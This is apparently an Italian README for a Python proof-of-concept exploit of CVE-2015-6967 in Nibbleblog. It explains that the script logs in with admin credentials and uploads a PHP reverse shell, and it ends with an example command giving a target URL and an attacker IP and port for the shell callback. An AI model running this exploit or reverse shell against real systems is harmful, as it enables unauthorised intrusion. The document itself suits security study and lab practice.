
Exploit PoC per CVE-2015-6967
Exploit PoC per CVE-2015-6967
Questo script Python sfrutta una vulnerabilità in Nibbleblog (CVE-2015-6967) per caricare una reverse shell su un target vulnerabile. Lo script accetta input dall'utente per l'URL del target, le credenziali utente e l'IP/porta del tuo host, quindi procede a sfruttare la vulnerabilità caricando una reverse shell PHP.
Questo script è destinato esclusivamente a scopi didattici. Non USARLO per attività illegali. Ottieni sempre un permesso esplicito prima di testare o sfruttare qualsiasi vulnerabilità su sistemi che non possiedi o per cui non hai l'autorizzazione ad accedere.
requestsargparsecoloramapyfigletPuoi installare le dipendenze richieste usando il seguente comando:
pip install requests colorama pyfiglet
Utilizzo
Lo script richiede diversi parametri per essere eseguito: url: URL di Nibbleblog target (es., http://10.10.14.14/nibbleblog) -U, --user: Nome utente per l'admin di Nibbleblog -P, --password: Password per l'admin di Nibbleblog -p, --host-port: La tua porta locale a cui la reverse shell deve connettersi -H, --host-ip: Il tuo indirizzo IP locale a cui la reverse shell deve connettersi
Esempio
python exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100